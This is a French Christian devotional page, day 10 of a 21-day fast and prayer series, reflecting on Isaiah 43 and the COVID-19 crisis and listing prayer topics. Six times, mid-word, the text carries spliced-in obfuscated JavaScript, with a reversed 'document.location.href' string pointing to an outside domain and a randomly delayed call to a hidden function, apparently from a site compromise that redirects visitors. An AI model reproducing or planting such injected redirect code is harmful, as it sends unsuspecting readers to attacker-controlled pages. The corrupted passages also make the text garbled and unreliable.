21 jours de Jeûne et Prière : Jour 10

Une chose nouvelle !
Esaïe 43 : 18-21
En ces temps particuliers, peut-on parler de «chose nouvelle» ?
Pourtant, plusieurs de nos politiques ont déjà déclaré qu’après cette crise «rien ne sera plus comme avant». Beaucoup annoncent également :
– une récession mondiale avec de graves conséquences économiques et sociales dans tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tous les pays (avec chômage, rationnement des denrées alimentaires…)
– des conflits entre nations s’accusant mutuellement d’être responsables de cette épidémie,
– une augmentation des cas de dépression et même de suicides parmi les personnes psychologiquement fragiles,
– un risque de voir ce genre de virus utilisé par des groupes extrémistes pour détruire…
Si nous focalisons sur tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tous les commentaires négatifs qui circulent dans les médias et sur les réseaux sociaux, il y a de quoi perdre espoir.
Pourtant les mesures prises pour enrayer cette crise sanitaire, comme l’arrêt des activités industrielles et le confinement, ont déjà entraîné des bénéfices en particulier sur l’environnement. La qualité de l’air s’améliore partobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tout dans le monde, la nature est renouvelée, des animaux reviennent dans des endroits où ils n’allaient plus à cause de l’activité humaine et de la pollution.
Et si même il y a des tensions dans certains foyers où règne la violence, pour d’autres, le confinement a déjà permis de rapprocher des familles et d’améliorer des relations.
Donc que penser de tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tout cela ?
Nous est-il possible de croire que Dieu a son mot à dire dans ces circonstances particulières ? Lui qui est Tout-Puissant ne peut-il pas transformer cette situation de destruction et de mort en une situation de restauration et de vie si nous le lui demandons ?
Si l’Eglise de Jésus-Christ se lève et s’unit dans la prière, l’intercession, le combat spirituel, l’annonce de la bonne nouvelle confirmée par des miracles et des guérisons, est-ce que ces temps que nous vivons ne pourraient pas être parmi les plus glorieux qu’elle ait jamais vécus ?
Proclamons cette « chose nouvelle » que Dieu est sur le point d’accomplir !

Sujets de prière
– Déclarons « Que tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}ton règne vienne, que ta volonté soit faite sur la terre comme au ciel ! ».
– Prions pour que l’évangile continue de se répandre jusqu’aux confins de la terre même durant ces temps difficiles.
– Demandons-Lui de nous donner Sa vision de la situation, une révélation du combat qui a lieu dans les lieux célestes entre les puissances des ténèbres.
– Demandons Sa sagesse pour intercéder avec efficacité pour changer le cours des événements.
– Que l’Eglise de Jésus-Christ se lève avec puissance et soit utilisée par Dieu pour accomplir Ses œuvres au milieu de cette génération.
– Continuons de prier pour la France, mais également pour l’Italie et l’Espagne qui sont très durement tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}touchées par le coronavirus.
Toujours avec l’aide et la direction du Saint-Esprit.
Ensemble dans le combat !